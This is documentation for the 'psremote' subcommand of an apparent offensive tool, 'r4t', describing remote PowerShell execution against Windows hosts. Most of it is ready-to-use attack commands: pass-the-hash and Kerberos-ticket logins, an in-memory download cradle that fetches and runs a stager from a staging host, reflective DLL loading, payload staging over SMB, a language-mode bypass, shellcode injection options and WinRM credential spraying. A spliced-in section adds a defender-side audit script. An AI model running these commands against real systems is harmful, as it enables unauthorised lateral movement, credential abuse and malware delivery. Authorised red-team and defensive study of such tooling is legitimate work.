psremote

The psremote command provides PowerShell Remoting operations for remote command execution, script delivery, and interactive sessions over WS-Management.

Usage

r4t psremote <subcommand> [flags]

Overview

PowerShell Remoting (PSRemote) is a protocol built on top of WS-Management (WinRM) that enables operators to execute PowerShell commands and scripts on remote Windows hosts. It operates over HTTP (port 5985) or HTTPS (port 5986) and is one of the most common administrative remote access methods in Windows enterprise environments. PSRemote is distinct from raw WinRM command execution — it provides a full PowerShell runspace on the remote host, enabling cmdlet execution, pipeline operations, and module loading that are not possible through basic cmd.exe execution.

Planned Capabilities

| Capability | Description |
| --- | --- |
| Command Execution | Execute PowerShell commands on remote hosts |
| Script Execution | Run PowerShell script files (.ps1) remotely |
| Interactive Session | Establish an interactive PowerShell Remoting session |
| Constrained Language Bypass | Execute in Full Language Mode where possible |
| Module Loading | Import and execute PowerShell modules remotely |

Authentication

PSRemote uses the same global authentication flags as all other R4t commands. The following authentication methods are supported:
| Method | Flag | Description |
| --- | --- | --- |
| Password | -u / -p | Domain username and password |
| NTLM Hash | --hash | Pass-the-hash via NT hash |
| Kerberos | --aes / --ccache | Kerberos authentication via AES key or ccache |
| Certificate (PFX) | --pfx | PFX certificate authentication |
| Certificate (PEM) | --cert / --key | PEM certificate and key authentication |
| Anonymous | --anonymous | Unauthenticated access |

# Execute a PowerShell command
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "Get-Process | Select-Object -First 10"

# Run a script file
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  -f ./enum-script.ps1

# Use NTLM hash authentication
r4t psremote exec -u admin --hash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 \
  10.10.10.20 "whoami /all"

# Use Kerberos via ccache
r4t psremote exec --ccache /tmp/krb5cc_admin -d corp.example.com 10.10.10.20 \
  "Get-ADUser -Filter * | Select-Object Name, Enabled"

# Use stored credentials
r4t psremote exec --credential-id 1 10.10.10.20 "hostname"

Connection Details

| Property | Value |
| --- | --- |
| Protocol | PowerShell Remoting over WS-Management |
| HTTP Port | 5985 |
| HTTPS Port | 5986 |
| Authentication | NTLM, Kerberos, Basic, Certificate |
| Remote Shell | Full PowerShell runspace |
| Access Group | Remote Management Users (RID 580) |

Payload Execution via PSRemote

PSRemote is a primary execution channel for delivering payloads to remote hosts. Its PowerShell runspace enables both fileless in-memory execution and disk-based delivery.

Fileless Execution

# Download and execute in memory (cradle)
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.5/stager.ps1')"

# Encoded command execution
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  --encoded "<base64-encoded-powershell>"

# Reflective DLL loading via PowerShell
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "[System.Reflection.Assembly]::Load([Convert]::FromBase64String('<b64-dll>'))"

Disk-Based Execution

# Stage payload via SMB, execute via PSRemote
r4t smb put -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  ./payload.exe C:\Windows\Temp\svc.exe
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "Start-Process C:\Windows\Temp\svc.exe"

Payload Factory Integration

When the payload factory is operational, PSRemote execution modules will request artifacts by capability:
| Capability Request | Use Case |
| --- | --- |
| execution=script, type=ps1 | PowerShell stager for direct execution |
| inmemory=true, execution=script | Fileless execution via encoded PowerShell |
| reflective=true, execution=reflective-load | Reflective DLL loaded via [Reflection.Assembly]::Load |
| execution=self-exec, os=windows | Standard EXE executed after file transfer |
| type=shellcode, inmemory=true | Shellcode injected via PowerShell process injection |

Remote Management Users (RID 580)

Access to PSRemote on a host is controlled by membership in the Remote Management Users local group (RID 580). By default, only members of this group (and local Administrators) can establish PowerShell Remoting sessions. This group is critical for attack path analysis — any user with Remote Management Users membership on a host can execute arbitrary PowerShell commands there.
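An added defender-side check, not part of the r4t documentation: a PowerShell audit of who holds PSRemote access on a host through the group above (resolved by its well-known SID S-1-5-32-580 rather than by name), together with the local Administrators group, the permissions on the default session endpoint, and the WinRM listeners. It assumes an elevated PowerShell session on the Windows host being reviewed.

```powershell
# Added example, not part of the r4t documentation: audit who can open a
# PowerShell Remoting session on this host. Assumes an elevated session on
# Windows PowerShell 5.1 or PowerShell 7 with the LocalAccounts module.

# 1. Members of Remote Management Users, looked up by well-known SID so the
#    check works regardless of OS display language (RID 580 = S-1-5-32-580).
$members = Get-LocalGroupMember -SID 'S-1-5-32-580' |
    Select-Object Name, ObjectClass, PrincipalSource

"Remote Management Users (RID 580) members:"
$members | Format-Table -AutoSize

# Domain principals in this local group are the attack-path edges worth
# reviewing: whoever controls such an account (or a nested domain group)
# gets a full PowerShell runspace on this host.
$domainMembers = @($members | Where-Object PrincipalSource -eq 'ActiveDirectory')
"Domain-sourced members: $($domainMembers.Count)"

# 2. Local Administrators can remote in as well; list them for the same reason.
"Administrators (RID 544) members:"
Get-LocalGroupMember -SID 'S-1-5-32-544' |
    Select-Object Name, ObjectClass, PrincipalSource | Format-Table -AutoSize

# 3. Effective permissions on the default endpoint that PSRemote connects to.
#    This SDDL-derived list is what actually grants or denies access.
"Microsoft.PowerShell endpoint permissions:"
(Get-PSSessionConfiguration -Name 'Microsoft.PowerShell').Permission

# 4. Which transports are listening (HTTP 5985 / HTTPS 5986 by default).
"WinRM listeners:"
Get-ChildItem WSMan:\localhost\Listener | ForEach-Object {
    $p = Get-ChildItem $_.PSPath
    [pscustomobject]@{
        Transport = ($p | Where-Object Name -eq 'Transport').Value
        Address   = ($p | Where-Object Name -eq 'Address').Value
        Port      = ($p | Where-Object Name -eq 'Port').Value
    }
} | Format-Table -AutoSize
```

An HTTP-only listener combined with domain groups in RID 580 is the combination to flag first, since it means the commands shown on this page run unencrypted at the transport layer unless message-level encryption is negotiated.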

Spray Integration

PSRemote credential validation can be tested through the WinRM spray protocol, since PSRemote operates over WinRM:
# Spray PSRemote/WinRM targets
r4t spray winrm 10.10.10.20 10.10.10.21

# Spray with stored users
r4t spray winrm --db-users --stop-on-lockout 10.10.10.20

Related Commands

  • winrm — Raw WinRM command execution (cmd.exe level)
  • wmi — WMI remote execution (alternative lateral movement)
  • smb — SMB file operations (payload staging)
  • spray — Multi-protocol credential spraying
  • bloodhound — BloodHound collection (includes psremote collection method)